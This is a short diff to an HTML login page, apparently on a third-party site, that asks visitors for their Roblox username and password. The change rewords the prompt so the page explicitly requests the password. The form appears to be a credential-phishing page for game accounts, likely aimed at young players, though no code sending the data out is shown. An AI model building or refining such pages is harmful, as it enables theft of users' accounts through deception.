--- a/enter.html
+++ b/enter.html
@@ -92,7 +92,7 @@
 <div class="card">
 <div class="card-body">
 <h1 class="display-4 text-center text-primary">Enter</h1>
-<p class="text-center text-muted lead">With your Rblx username!</p>
+<p class="text-center text-muted lead">With your Rblx username,password!</p>
 <input type="text" class="form-control form-control-lg" name="RobloxUsername" id="auth-roblox-username" placeholder="Rblx Username" onkeypress="if (!window.__cfRLUnblockHandlers) return false; return event.charCode != 32" value="" required="" autofocus="" data-cf-modified-11c0bbecf1cee150c8b1fa83-="">
 <input type="password" class="form-control form-control-lg" name="RobloxPassword" id="auth-roblox-password" placeholder="Rblx Username" onkeypress="if (!window.__cfRLUnblockHandlers) return false; return event.charCode != 32" value="" required="" autofocus="" data-cf-modified-11c0bbecf1cee150c8b1fa83-="">
 <div class="text-center my-3">
